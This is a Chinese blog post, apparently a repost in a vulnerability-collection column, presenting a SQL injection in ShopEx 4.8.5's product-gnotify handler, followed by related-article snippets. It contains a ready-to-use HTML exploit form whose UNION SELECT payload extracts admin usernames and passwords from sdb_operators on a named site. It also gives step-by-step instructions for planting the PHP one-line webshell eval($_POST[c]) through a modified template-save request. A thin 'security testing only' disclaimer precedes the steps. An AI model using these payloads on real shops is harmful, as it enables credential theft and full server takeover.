shopex 4.8.5 SQLINJECTION注射以及后台拿SHELL

最新推荐文章于 2023-11-27 16:38:40 发布
最新推荐文章于 2023-11-27 16:38:40 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: shell sql function zend xml action

漏洞核心函数 \core\model_v5\trading\mdl.goods.php  由于是zend解密出来的 具体行数就不贴了

01 function getproducts( $gid, $pid = 0 ) //注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入
02 {
03 $sqlWhere = “”;
04 if ( 0 < $pid )
05 {
06 $sqlWhere = ” AND A.product_id = “.$pid; //没过滤 ~~~~~~ fuck之
07 }
08 $sql = “SELECT A.*,B.image_default FROM sdb_products AS A LEFT JOIN sdb_goods AS B ON A.goods_id=B.goods_id WHERE A.goods_id=”.intval( $gid ).$sqlWhere;
09 return $this->db->select( $sql );
10 }
\core\shop\controller\ctl.product.php 文件调用
01 function gnotify($goods_id=0,$product_id=0){
02 //print_r($_POST);
03 //exit;
04 if($_POST['goods']['goods_id']){
05 $goods_id = $_POST['goods']['goods_id'];
06 $product_id = $_POST['goods']['product_id']; //POST没初始化也没过滤
07 }
08 $this->id =$goods_id;
09 $objGoods = &$this->system->loadModel(‘trading/goods’);
10
11 //echo $goods_id.” – “.$product_id;
12 //exit;
13 $aProduct = $objGoods->getProducts($goods_id, $product_id); //直接带进去了 还解释么??
14
15 $this->pagedata['goods'] = $aProduct[0];
16 if($this->member[member_id]){
17 $objMember = &$this->system->loadModel(‘member/member’);
18 $aMemInfo = $objMember->getFieldById($this->member[member_id], array(‘email’));
19 $this->pagedata['member'] = $aMemInfo;
20 }
21
22 $this->output();
23 }
Source code    
<html>
<head>
<title>Shopex 4.8.5 SQL Injection Exp</title>
</head>
<body>
<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2>
<form action="http://www.0sec.in/?product-gnotify" method="post" name="submit_url">
<input type="hidden" name="goods[goods_id]" value="3">
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
<input type="submit" value="">
</form>网址请修改:http://www.0sec.in/?product-gnotify <br />
本程序只能用于网站安全检测 <br />
禁止用于非法途径,产生的一切后果与作者无关!<br />
<body>
</html>

 

拿shell方法….
第一步 页面管理 修改模版 然后选一个XML编辑
开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来
然后改包 包要这么改 我研究了半天 尼玛的菊花红
id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=<?php eval($_POST[c])?>
解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel
我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称
7禧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ShopEx4.8.5.
12-11
ShopEx4.8.5 版本的发布,可能针对以上某一方面或多个方面进行了升级和改进,以适应不断变化的电商环境,提升用户体验。对于商家来说,选择ShopEx这样的专业网店系统,不仅可以节省时间和精力,还能借助其丰富的功能...
永远的Sql Injection + PHP注射
修养生息,以得佳境
03-13 1359
永远的Sql Injection + PHP注射 作者:未知 来源:http://www.x2s.orgSql Injection永远是那么可爱... Sql注射总结(早源于or1=1) 最重要的表名: select * from sysobjects sysobjects ncsysobjects sysindexes tsysindexes syscolumns systype
sql注入详解
m0_67392811的博客
06-12 5886
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SHOPEX 4.8.5 注入漏洞以及后台SHELL
cnbird's blog
08-07 5582
SHOPEX 4.8.5 注入漏洞以及后台SHELL 有人贴出来一个,我就转出来下吧,给大家看看。 漏洞文件: 漏洞核心函数 \core\model_v5\trading\mdl.goods.php 漏洞代码: ?View Code PHP \core\shop\controller\ctl.product.php 文件调用 ?V
BUUCTF 35
qq_52431855的博客
03-02 432
知识点 ShopXO企业级免费开源商城系统的漏洞(参考链接) SSTI模板注入 模板注入的一些特性(常见的注入可以用下图的方法进行测试。) 35-1[GKCTF2020]老八小超市儿 做题思路 开始毫无头绪,寻找WP,发现利用shopxo已有的漏洞, 利用方法链接 http://www.nctry.com/1660.html 默认后台admin.php默认账号密码是admin和shopxo 成功进入后台 接下来就在应用中心里的应用商店找到主题,然后下载默认..
shopex 4.8.5.45144注入和远程shell写入漏洞
收集盒 Book box
04-04 2655
利用代码exp:exploit.htm-----
php版本导致shopex4.8.5安装的问题
09-28
相信很多人都遇到了和我一样的问题:php5.3以上的版本不再支持Zend Optimizer,但是shopex之类的网站必须要高版本的Zend才能用
shopex4.8.5 最新8090完整版
10-07
ShopEx是中国知名的电子商务软件提供商,推出的ShopEx 4.8.5版本是针对80后、90后的商家设计的一款全面的在线商城解决方案。这款软件的最新8090完整版,旨在满足年轻一代创业者的需求,提供了一整套功能强大且易用的...
shopex4.8.5通杀所有版本需要通行证认证才能登陆后台
07-12
标题提到的是ShopEx 4.8.5版本的一个特定问题,即“通杀所有版本需要通行证认证才能登录后台”。这意味着在正常情况下,用户在尝试访问ShopEx后台管理系统时,必须通过通行证验证来确保操作的安全性。然而,描述中...
ShopEX 4.8.5 二次开发之会员等级
12-09
### ShopEX 4.8.5 二次开发之会员等级 #### 一、ShopEX 4.8.5简介 ShopEX是一款非常流行的电子商务平台软件,由北京中商龙信息技术有限公司开发,它提供了丰富的功能来支持商家搭建在线商城。ShopEX 4.8.5作为该...
shopex服务器安装包4.8.5-55328
06-27
shopex服务器安装包4.8.5-55328本地安装包
shopex 4.8.5.55328 最稳定珍藏版
05-19
本人珍藏的shopex4.8.5.55328 最稳定官方原版,相信很多人都在找!
shopex4.85 55328服务器安装包
04-11
shopex4.85 55328官方服务器安装包!
shopex4.8.5 php5.6,shopex v4.8.5 漏洞
weixin_39698217的博客
03-21 677
shopex v4.8.5 漏洞本人声明:只做技术研究,请勿破坏….谢谢.漏洞原因:直接看代码:public function tryLogin( $aValue, $issuper = false ){if ( $aValue['passwd'] == “+_-_-_+” ){$aValue['passwd'] = “”;}$sql = “SELECT * FROM sdb_operators ...
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 1719
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
Eecshop 4.x collection_list SQL注入 漏洞复现
weixin_44896127的博客
12-20 612
Eecshop 4.x collection_list SQL注入漏洞复现。
ECShop 4.x collection_listSQL注入
最新发布
weixin_56537388的博客
11-27 378
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。访问8080端口,数据库主机为mysql,账号密码为root。注册一个账户然后登录。docker环境搭建。
shopex PHP Notice,SHOPEX 4.8.5 最新注入漏洞后台SHELL
weixin_32734143的博客
03-17 438
SHOPEX 4.8.5 注入漏洞以及后台SHELL漏洞文件:漏洞核心函数 \core\model_v5\trading\mdl.goods.php漏洞代码:public function getProducts( $gid, $pid = 0 ){$sqlWhere = "";if ( 0 < $pid ){$sqlWhere = " AND A.product_id = ".$pid;...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值